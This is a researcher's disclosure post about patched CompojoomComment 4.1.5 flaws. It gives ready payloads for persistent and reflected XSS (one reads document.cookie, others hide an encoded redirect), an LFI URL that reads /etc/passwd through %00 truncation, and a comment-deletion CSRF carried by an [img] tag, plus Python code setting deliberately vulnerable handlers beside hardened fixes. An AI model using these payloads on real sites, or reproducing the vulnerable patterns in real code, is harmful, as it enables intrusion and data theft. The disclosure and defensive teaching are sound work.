Wednesday, 01 September 2010 15:48
Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).
Malformed BBCode Persistent XSS, #1
a[img]b[img]c[/img]d[/img]e a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e
Malformed BBCode Persistent XSS, #2
[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]
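Both payloads above work because the BBCode converter drops the tag argument straight into an HTML attribute, so a stray quote ends the attribute and whatever follows becomes a new one (style, onmouseover). The following is an added Python example, not CompojoomComment's PHP code: a simplified regex converter in the style of many BBCode implementations of the period, beside a hardened one that escapes first and only emits a tag when the argument passes an allow-list. The sample comments are constructed and far simpler than the contest payloads, and img.example / a.example are placeholder hosts.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample comments modelled on the entries above (not the exact
# contest payloads): attribute breakout via a stray quote, a javascript: URL,
# and a benign comment that must keep rendering.
SAMPLES = {
    "img_breakout": "[img]x' onmouseover='alert(1)[/img]",
    "color_breakout": "[color=red' onmouseover='alert(1)]hover me[/color]",
    "js_url": "[url=javascript:alert(document.cookie)]click[/url]",
    "benign": "see [img]http://img.example/a.png[/img] and [url=http://a.example]site[/url]",
}

IMG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.S)
URL_RE = re.compile(r"\[url=(.*?)\](.*?)\[/url\]", re.S)
COLOR_RE = re.compile(r"\[color=(.*?)\](.*?)\[/color\]", re.S)


def naive_bbcode_to_html(text):
    """Vulnerable: each regex copies its captured argument verbatim into a
    single-quoted attribute, so a quote in the argument ends the attribute."""
    text = IMG_RE.sub(r"<img src='\1' />", text)
    text = URL_RE.sub(r"<a href='\1'>\2</a>", text)
    text = COLOR_RE.sub(r"<span style='color:\1'>\2</span>", text)
    return text


SAFE_SCHEMES = {"http", "https"}
COLOR_OK = re.compile(r"^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$")


def _safe_url(escaped):
    """Return an attribute-safe URL, or None unless it is an absolute http(s)
    URL with no whitespace or control characters."""
    raw = html.unescape(escaped)
    if any(ord(ch) < 0x21 for ch in raw):
        return None
    parts = urlparse(raw)
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return html.escape(raw, quote=True)


def hardened_bbcode_to_html(text):
    """Escape the whole comment first, then emit a tag only when its argument
    passes the allow-list; a rejected tag stays visible as plain text."""
    text = html.escape(text, quote=True)

    def img(m):
        src = _safe_url(m.group(1))
        return f'<img src="{src}" />' if src else m.group(0)

    def url(m):
        href = _safe_url(m.group(1))
        return f'<a href="{href}">{m.group(2)}</a>' if href else m.group(0)

    def color(m):
        return (f'<span style="color:{m.group(1)}">{m.group(2)}</span>'
                if COLOR_OK.match(m.group(1)) else m.group(0))

    text = IMG_RE.sub(img, text)
    text = URL_RE.sub(url, text)
    text = COLOR_RE.sub(color, text)
    return text


if __name__ == "__main__":
    for name, comment in SAMPLES.items():
        print(name, "naive:   ", naive_bbcode_to_html(comment))
        print(name, "hardened:", hardened_bbcode_to_html(comment))
```

The order matters: escaping after tag substitution would destroy the generated HTML, while escaping before it means every argument the regexes see is already inert and only the validated, re-escaped value ever reaches an attribute. Rejected tags are deliberately left as text rather than stripped, so the author sees why the markup did not render.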
Local File Inclusion
?option=com_comment&no_html=1&component=../../../../../../../../../../../../etc/passwd%00&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any
Reflective XSS
?option=com_comment&no_html=1&component=<script>alert(document.cookie);</script>&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any
Administrator Persistent XSS
The Name and Title fields in the comment edit form are not sanitized: a double quote in either value breaks out of the form field's attribute and allows XSS in the administrator backend, but only if an administrator opens that comment for editing.
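The LFI, the reflective XSS and the administrator XSS above are three outcomes of the same mistake: the `component` parameter (and, in the edit form, the stored Name/Title) is used as a file name and echoed into markup without validation or encoding. The following is an added Python example, not the plugin's PHP code, that models the vulnerable behaviour beside the fix for each case. The directory layout, the KNOWN_COMPONENTS list and the secret.txt stand-in for /etc/passwd are constructed for the example; the NUL truncation models PHP builds before 5.3.4, which handed the include path to the C library as a NUL-terminated string, so `%00` dropped the `.php` suffix.

```python
import html
import os
import re
import tempfile

# A throwaway directory tree standing in for a Joomla install (constructed for
# this example; no real system files are read).
ROOT = tempfile.mkdtemp()
PLUGIN_DIR = os.path.join(ROOT, "components", "com_comment", "plugins")
os.makedirs(PLUGIN_DIR)
with open(os.path.join(PLUGIN_DIR, "com_content.php"), "w") as fh:
    fh.write("<?php // legitimate plugin ?>")
with open(os.path.join(ROOT, "secret.txt"), "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")  # stands in for /etc/passwd


def vulnerable_load(component):
    """Models include($dir . $component . '.php') on a PHP build that cuts the
    path at the first NUL byte, which is exactly what the %00 in the URL relies on."""
    path = (PLUGIN_DIR + "/" + component + ".php").split("\x00", 1)[0]
    with open(path) as fh:
        return fh.read()


KNOWN_COMPONENTS = {"com_content", "com_weblinks"}   # assumed allow-list
NAME_OK = re.compile(r"^[a-z0-9_]{1,64}$")


def hardened_load(component):
    """Allow-list the name, then confirm the resolved path is still inside
    PLUGIN_DIR. Returns None instead of loading anything on rejection."""
    if not NAME_OK.match(component) or component not in KNOWN_COMPONENTS:
        return None
    base = os.path.realpath(PLUGIN_DIR)
    path = os.path.realpath(os.path.join(base, component + ".php"))
    if os.path.commonpath([base, path]) != base:
        return None
    with open(path) as fh:
        return fh.read()


def vulnerable_error(component):
    """Reflective XSS: the raw parameter is echoed into the AJAX response."""
    return f"<div class='error'>Unknown component: {component}</div>"


def hardened_error(component):
    return f"<div class='error'>Unknown component: {html.escape(component, quote=True)}</div>"


def vulnerable_edit_field(title):
    """Admin edit form: a double quote in the stored title ends the value attribute."""
    return f'<input type="text" name="title" value="{title}" />'


def hardened_edit_field(title):
    # quote=True turns both quote characters into entities, so the value can
    # never close the attribute it sits in.
    return f'<input type="text" name="title" value="{html.escape(title, quote=True)}" />'


if __name__ == "__main__":
    print(vulnerable_load("../../../secret.txt\x00"))
    print(hardened_load("../../../secret.txt\x00"))
    print(hardened_error("<script>alert(document.cookie);</script>"))
    print(hardened_edit_field('x" onfocus="alert(1)" autofocus="'))
```

The realpath containment check is kept even though the allow-list already makes traversal impossible; belt and braces costs nothing here, and it still protects the loader if someone later relaxes the name pattern.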
Comment Deletion CSRF
Embedding the "delete comment" URL in an [img] BBCode tag causes the browser of any logged-in administrator who views the page to fetch that URL, deleting the comment: the delete action was reachable with a plain GET request, and the browser attaches the admin's session cookie to the image request.
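The fix is to refuse state changes on GET and to require a per-session token that an attacker-controlled page cannot know. The following is an added Python example, not the plugin's code, modelling the delete handler before and after that change; the comment store, the session layout and the `token` parameter name are assumptions, while `josctask` and `comment_id` follow the parameter names used on this page.

```python
import hmac
import secrets

COMMENTS = {7: "first!", 8: "nice post"}   # constructed comment store


def admin_session():
    """What the server holds for a logged-in administrator, including a
    per-session anti-CSRF token (assumed design, not the plugin's own)."""
    return {"user": "admin", "csrf": secrets.token_hex(16)}


def vulnerable_delete(method, params, session, comments):
    """Deletes on any request that carries an admin session, GET included, so
    an <img> pointing at ...josctask=delete&comment_id=7 does the job."""
    if session.get("user") != "admin":
        return False
    return comments.pop(int(params["comment_id"]), None) is not None


def hardened_delete(method, params, session, comments):
    """State change only on POST, and only when the submitted token equals
    the session token (constant-time compare)."""
    if session.get("user") != "admin":
        return False
    if method != "POST":
        return False
    token = params.get("token", "")
    if not isinstance(token, str) or not hmac.compare_digest(token, session["csrf"]):
        return False
    return comments.pop(int(params["comment_id"]), None) is not None


# The request an [img] tag in a comment produces: GET, the admin's cookies
# attached by the browser, and no way for the attacker to supply a token.
IMG_TAG_REQUEST = ("GET", {"option": "com_comment", "josctask": "delete", "comment_id": "7"})


if __name__ == "__main__":
    session = admin_session()
    store = dict(COMMENTS)
    print("vulnerable, via <img>:", vulnerable_delete(*IMG_TAG_REQUEST, session, store))
    store = dict(COMMENTS)
    print("hardened, via <img>:  ", hardened_delete(*IMG_TAG_REQUEST, session, store))
    print("hardened, real form:  ", hardened_delete(
        "POST", {"comment_id": "7", "token": session["csrf"]}, session, store))
```

The same two checks belong on every state-changing admin task, not just deletion; the method check alone is not enough, because an attacker can auto-submit a cross-site POST form, which is why the token is what actually carries the protection.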
Timeline
- Vulnerabilities Discovered: 4-9 August 2010
- Vendor Notified: 4-9 August 2010
- Vendor Response: 4-9 August 2010
- Update Available: 9 August 2010
- Disclosure: 1 September 2010
Last Updated on Thursday, 30 September 2010 17:34
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.